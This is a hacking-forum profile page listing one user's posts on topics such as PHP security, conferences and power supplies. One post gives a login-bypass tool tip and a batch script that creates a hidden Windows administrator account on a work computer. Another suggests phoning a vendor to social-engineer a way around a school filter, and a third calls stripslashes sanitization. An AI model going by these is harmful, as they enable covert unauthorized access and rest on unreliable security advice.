Trikk

Members
  • Content count

    348
  • Joined

  • Last visited

Community Reputation

5 Neutral

About Trikk

  • Rank
    SUPR3M3 31337 Mack Daddy P1MP

Contact Methods

  • AIM hella steezy
  • Website URL http://www.vendettanetworking.com
  • ICQ 0

Profile Information

  • Gender Male
  • Interests h4x1n
  • Country United States
  • Location Portland, OR
  1. Help with a Communistic-security level school network?

    If it has a whitelist, and will only access the websites in that whitelist, there is nothing you can really do =/ If all else fails, their phone number on their website is listed as 877.369.8686. Call them, tell them you picked one of these guys up, and tell them you are facing some sort of issue with the unit. Just ask them a ton of questions, eventually you can get enough info to circumvent the product I'm sure. EDIT: They are laptops.. do you guys get to take them home? This is very important.
  2. CMS Security

    Well, first off, NEVER trust user input. When inserting records into a mysql database, always sanitize the input by using mysql_real_escape_string (http://php.net/manual/en/function.mysql-real-escape-string.php) Also, when using $_POST[] or $_GET[], you need to sanitize that input as well by using stripslashes, or such. Incorporating this into any code you do will help you tremendously. Another thing is, since you are building a CMS, apart from just password protecting the admin page, be sure to use an htaccess. The htaccess should only allow by certain ip's you own. Example of .htaccess: AuthUserFile /home/test/.htpasswd AuthGroupFile /dev/null AuthName "Administrative Portal" AuthType Basic <limit GET> satisfy any order deny,allow deny from all allow from 127.0.0.1 allow from 221.23.249.294 require valid-user </limit> You must place this .htaccess in the directory of your CMS admin page/directory. This will only allow the ip's listed to access your admin page. Another thing, is when you include files, don't do something like the following: <?php include($includedir."/config.php"); ?> If your PHP config is not config'd properly, someone can do an include on your website and use a php shell to take over your website as well as your server. These are the basics, I hope it helps. If anyone has anything else to add, please do.
  3. How to hack a computer on same router

    Do you have a receipt of the computer you are trying to "hack" into, as well as a receipt for the internet access it is utilizing? If so, post it, and we will gladly help you. If not, this is illegal, and we do not condone this.
  4. SpyEye

    All versions that I know of for SpyEye and Zeus are backdoored. Wouldn't trust this.
  5. Android Call Encryption

    Reverse engineering it, as in you've seen one? Do you have any links or references to such a device or software?
  6. 360/503

    There was a 2600 meeting at Backspace Cafe but, as far as I remember, no one ever shows up. Great cafe though, good place to game I'd be down for starting one up, as I'm in the 503 area.
  7. That paper I mentioned...

    I liked it, and felt that it was a very good read. However, most of it presumably standard to 95% of people on this board, it's definitely something to recommend to non-tech-savvy people. I liked how you first explained to them how the network is actually a network and what each layers does, as most people do not do that. But if you're going to go that in-depth about the network itself, you might as well give a demonstration on how attackers can compromise your system, and how they do it, if you don't do X, Y, Z. Just my two cents. I rarely come across any good reads on network security. Also, if anyone is reading this and has come across some good papers on network security, pref. more advanced, please paste the links!
  8. is there such a thing as to much power?

    Just because it's a 1000W power supply, doesn't mean it's more powerful than a 650W or a 500W and can still under-power your electronics. Consider reading up on the rails of the power supply, and read user reviews. I remember having a power supply come in for black friday that all of our customers went crazy for, because it was a 1000W power supply for an extremely cheap price. The week after, we had daily returns of it for under-powering their stuff based on the fact that it had really crappy rails.
  9. Sniffing Logon Details On Network

    Just be straight up about it and ask her. Also, if you feel uncomfortable enough to crawl the deep dark interwebz in search of a forum of intellectual computer enthusiasts to help you steal login credentials, that should have been an immediate red flag to end the relationship with her. No trust, no relationship. Keep her around as an occasional bang IMO. EDIT: Also, as much as people here would like to help you.. giving such information to you about gaining unauthorized login credentials is against what this community believes in. As a result, you won't get any posts that you were expecting. Hire a private investigator if you really wanna know the truth
  10. I am GOD!

  11. DEFCON 18

    I'm going from July 29th to August 2nd. Have there been previous BinRev meet-ups? Does anyone have a map or such on the Riviera where we can designate a spot and time?
  12. conference for a noob

    *cough* http://www.freemagicconference.com/
  13. passing my own values to a PHP based site?

    When you select your entry, it sends back a method of either a POST or a GET. What you need to do is view the source, and check if it's being sent a POST or GET request, and action is what script the values are being sent to. Once you have that, you simply craft the POST or GET and send it to the script. For more info: http://www.tizag.com/phpT/postget.php
  14. Exploring Work Computers w/Knoppix

    I wouldn't recommend using Knoppix on a work computer. In fact, I wouldn't recommend tampering with the computer at all. However, if you got permission, this is what I would do. First off, if someone see's a penguin on the screen, chances are they will question what it is. I wouldn't suggest using Knoppix. You'll just attract attention to yourself. Use a program called Konboot, it will allow you to pop the CD in and continue with loading Windows, however, it re-writes the SAM file temporarily on-the-fly so that you can use any password to login. Once you're logged in as administrator, make your own account, and hide it. This is an example created by IllWill over @ illmob @echo off net user illwill password /add && net localgroup administrators illwill /add echo Windows Registry Editor Version 5.00> c:\hide.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>> c:\hide.reg echo "illwill"=dword:00000000>> c:\hide.reg REGEDIT /S c:\hide.REG DEL /Q c:\hide.REG Exit This will create the user "illwill" with the password "password" as an administrator and hide it from the user login. After that, do as you must. If it's on a network, Wireshark might be a good start Again, I must warn you though, if you don't have permission, it's really not worth it..
  15. WebM (VP8) Video Codec for HTML5 video tag

    firefox development builds already have it. Chrome developer preview builds should be available on May 24th. Opera also has developer builds. Awesome! After I found out about using HTML5 video I tried searching to get a copy but everywhere required a hefty payment in order to use their version. The benefits of HTML5 are going to be insane for web development! Thanks for the post